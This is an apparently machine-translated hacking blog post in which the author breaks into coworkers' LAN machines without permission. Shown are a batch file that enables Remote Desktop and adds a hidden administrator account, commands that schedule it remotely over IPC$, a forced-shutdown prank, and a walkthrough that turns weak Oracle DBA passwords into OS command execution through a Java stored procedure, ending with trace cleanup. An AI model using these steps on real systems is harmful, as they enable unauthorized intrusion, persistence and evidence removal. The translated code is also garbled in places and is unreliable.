Oracle 10g weak password attack

 

13:52:44 | category:

Hack everything! | Tag: Java RC Oracle bufsize int
| Large font size, medium/small subscription

 

Recently, the Network speed is ungeliveble ......

"Internet access for all, never download BT !" This is the purpose of LAN! Helpless, a lot of kids shoes are downloaded, and they are all some bad TV series. A few g, dozens of G, and 10 m network speeds can withstand such a toss!

Fortunately, their security awareness is not very good. The day before yesterday they used the default hidden shared in another segment some children's shoes in the C drive lost the following batch processing mstsc. BAT:

Reg Add "HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server"/V fdenytsconnections/T REG_DWORD/D 0/F Net user test/Add Net localgroup administrators test/Add

The above three items are:

1. Open Remote Desktop

2. Add a user name/password: Test/test

3. Add test to the Administrator Group

My LAN machines here are all Windows 2003 and the logon window is:

They do not seem to have high security awareness, so I don't have to add anything to hide users, and then use the following command to quickly occupy

C:> net use \ 192.168.3.46 \ IPC $ "/User: Administrator The command is successfully completed. C:> net time \ 192.168.3.46 \ 192.168.3.46 the current time is The command is successfully completed. C:> at \ 192.168.3.46 :16 c: \ windows \ system32 \ mstsc. bat A new job is added. Its job ID is 2.

Is there a machine waiting for me? People who are not good at watching TV series ......

I won't talk about it if I fix it.

After, win + R: mstsc and test are used to successfully access the machine (of course, you can log on to the machine using administrator, I created a user to prevent him from having to change his password. I have to work hard again ......)

He installed the traffic monitoring software on his computer. First, let's set a traffic limit. Then, whoever downloads the software will give it to him.

Shutdown-s-c ", don't download it ...... Go home, wife, children, hot cakes, OK ?" -T 10

If he doesn't shut down-a, wait for the shutdown!

Then we performed the above operations in batches, which is really much better ......

Some of the guys in 192.168.3.x CIDR blocks were hit, and their CIDR blocks came again ......

Maybe it was rendered. This guy actually changed his password, and the sharing was completely closed. The traffic was high. Didn't he undo it ?!

Why should I use Oracle to learn Java? I don't think Oracle will let you plant it, will it?

Because the machines here are all flushed, all Oracle passwords are the same and DBA permissions are applied!

First use the msvcrt. dll file called by Mickey brother:

That is, an error occurred while calling the library file. The online explanation is all listener. ora and tnsnames. ora. What should I do? If I could enter his computer to modify the Oracle configuration file, what would I do if I had to spend so much time?

The final method is as follows:

Since it is a weak password, I directly use PL/SQL developer (Oracle data development software, mostly online) to connect to his computer's Oracle service.

Connect to Oracle on his computer and create an SQL window ...... Then:

Step 1:Create a Java sources file to execute cmd. After learning Java, you will understand what this code is mainly for, and it is also very simple.

Create or replace and compile Java source named "util" As Import java. Io .*; Import java. Lang .*; Public class util extends object { Public static int runthis (string ARGs) { Runtime RT = runtime. getruntime (); Int rc =-1; Try { PROCESS p = rt.exe C (ARGs ); Int bufsize = 4096; Bufferedinputstream Bis = new bufferedinputstream (P. getinputstream (), bufsize ); Int Len; Byte buffer [] = new byte [bufsize]; // Echo back what the program spit out While (LEN = bis. Read (buffer, 0, bufsize ))! =-1) System. Out. Write (buffer, 0, Len ); Rc = P. waitfor (); } Catch (exception E) { E. printstacktrace (); Rc =-1; } Finally { Return RC; } } }

Step 2:Create a function to call this code

Create or replace function run_cmd (f_cmd in varchar2) Return number As Language Java Name 'util. runthis (Java. Lang. String) return integer ';

Step 3: Call this function during creation

Create or replace procedure RC (p_cmd in varchar2) As X number; Begin X: = run_cmd (p_cmd ); End;

Switch to the command prompt on your computer:

1. Connection:

Sqlplus system/password @ IP: Port Number/Data Service name

2. Execute the following code:

Variable X number; Set serveroutput on; Exec dbms_java.set_output (100000 ); Grant policyspriv to system;

3. Force intrusion code:

Exec: X: = run_cmd ('cmd/C cmd command ');

It's all done. What do you do if you don't want to do anything? Open a backdoor or something ......

Shown below:

Into his computer ...... Give a warning! Continue learning ......

Of course, after the attack is completed, all the javasources files, functions, and stored procedures left in Oracle are deleted, so they are not left!